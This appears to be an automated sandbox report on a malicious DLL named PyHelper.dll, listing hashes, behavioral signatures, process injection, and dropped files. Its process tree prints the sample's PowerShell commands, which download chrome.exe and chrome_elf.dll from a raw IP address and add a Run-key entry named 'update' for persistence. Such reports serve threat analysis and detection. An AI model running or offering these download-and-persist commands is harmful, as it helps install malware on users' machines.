Analysis
-
max time kernel
1782s -
max time network
1503s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
11-05-2024 10:41
Static task
static1
Behavioral task
behavioral1
Sample
PyHelper.dll
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
PyHelper.dll
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
PyHelper.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
PyHelper.dll
Resource
win11-20240508-en
General
-
Target
PyHelper.dll
-
Size
236KB
-
MD5
b7bd2243978cfe44cc0d4b28086c4004
-
SHA1
bbc0f43de71cddc0a1be48fa98b936ebffb817ac
-
SHA256
bfeaf1fe93923425053e245e2ccefae72a65f75edad1f1689c55c4f0a1e84455
-
SHA512
e7f924564bcf1a6173cf29bbbcb16994b3e527a93c1059e7be8e86aa5f5887a852a6a9084862caf3e192a5a70336e6ee22bc169c1f1e0300fa72bb9049a0141f
-
SSDEEP
3072:aSro30CSFTVOo7qzijtY7HBGsBel05YGoAgbceBBCxRXu+E+NO9o6Kgv:akoELH7k8tY7HkLljr1CTbE55
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 41 4276 powershell.exe 42 1676 powershell.exe 43 1532 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 1676 powershell.exe 1532 powershell.exe 4276 powershell.exe -
Downloads MZ/PE file
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\Documents\\chrome.exe" powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 1532 powershell.exe 4276 powershell.exe 1812 powershell.exe 1676 powershell.exe 4276 powershell.exe 1676 powershell.exe 1532 powershell.exe 1812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1532 powershell.exe Token: SeDebugPrivilege 4276 powershell.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
regsvr32.exeRuntimeBroker.exedescription pid process target process PID 4336 wrote to memory of 4060 4336 regsvr32.exe RuntimeBroker.exe PID 4336 wrote to memory of 4060 4336 regsvr32.exe RuntimeBroker.exe PID 4336 wrote to memory of 4060 4336 regsvr32.exe RuntimeBroker.exe PID 4336 wrote to memory of 4060 4336 regsvr32.exe RuntimeBroker.exe PID 4336 wrote to memory of 4060 4336 regsvr32.exe RuntimeBroker.exe PID 4336 wrote to memory of 4060 4336 regsvr32.exe RuntimeBroker.exe PID 4060 wrote to memory of 1676 4060 RuntimeBroker.exe powershell.exe PID 4060 wrote to memory of 1676 4060 RuntimeBroker.exe powershell.exe PID 4060 wrote to memory of 4276 4060 RuntimeBroker.exe powershell.exe PID 4060 wrote to memory of 4276 4060 RuntimeBroker.exe powershell.exe PID 4060 wrote to memory of 1532 4060 RuntimeBroker.exe powershell.exe PID 4060 wrote to memory of 1532 4060 RuntimeBroker.exe powershell.exe PID 4060 wrote to memory of 1812 4060 RuntimeBroker.exe powershell.exe PID 4060 wrote to memory of 1812 4060 RuntimeBroker.exe powershell.exe
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\PyHelper.dll1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\RuntimeBroker.exeRuntimeBroker.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/chrome_elf.dll" -OutFile "$env:USERPROFILE\Documents\chrome_elf.dll""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/chrome.exe" -OutFile "$env:USERPROFILE\Documents\chrome.exe""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/105.0.5195.102.manifest" -OutFile "$env:USERPROFILE\Documents\105.0.5195.102.manifest""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-C "New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "update" -Value "$env:USERPROFILE\Documents\chrome.exe" -PropertyType "String" -Force"3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD588dc70c361a22feac57b031dd9c1f02f
SHA1a9b4732260c2a323750022a73480f229ce25d46d
SHA25643244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA51219c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD512ff85d31d9e76455b77e6658cb06bf0
SHA145788e71d4a7fe9fd70b2c0e9494174b01f385eb
SHA2561c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056
SHA512fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d405540758f0f5bdaab94f1a054cc67d
SHA107e307420a26d17c2dc1226af6e72018da4ae26c
SHA2562ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61
SHA51259496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cfzjrnnk.fp1.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1532-30-0x00000224EF5C0000-0x00000224EF5E2000-memory.dmpFilesize
136KB
-
memory/4060-4-0x00000190C39D0000-0x00000190C39D1000-memory.dmpFilesize
4KB
-
memory/4060-10-0x00000190C3CF0000-0x00000190C3D0D000-memory.dmpFilesize
116KB
-
memory/4060-9-0x00000190C3900000-0x00000190C391A000-memory.dmpFilesize
104KB
-
memory/4060-17-0x00000190C3CF0000-0x00000190C3D0D000-memory.dmpFilesize
116KB
-
memory/4060-7-0x00007FFE27024000-0x00007FFE27025000-memory.dmpFilesize
4KB
-
memory/4060-5-0x00000190C39E0000-0x00000190C39E1000-memory.dmpFilesize
4KB
-
memory/4276-24-0x00007FFE26F80000-0x00007FFE27189000-memory.dmpFilesize
2.0MB
-
memory/4276-70-0x00007FFE26F80000-0x00007FFE27189000-memory.dmpFilesize
2.0MB
-
memory/4336-8-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/4336-16-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/4336-0-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/4336-2-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/4336-1-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB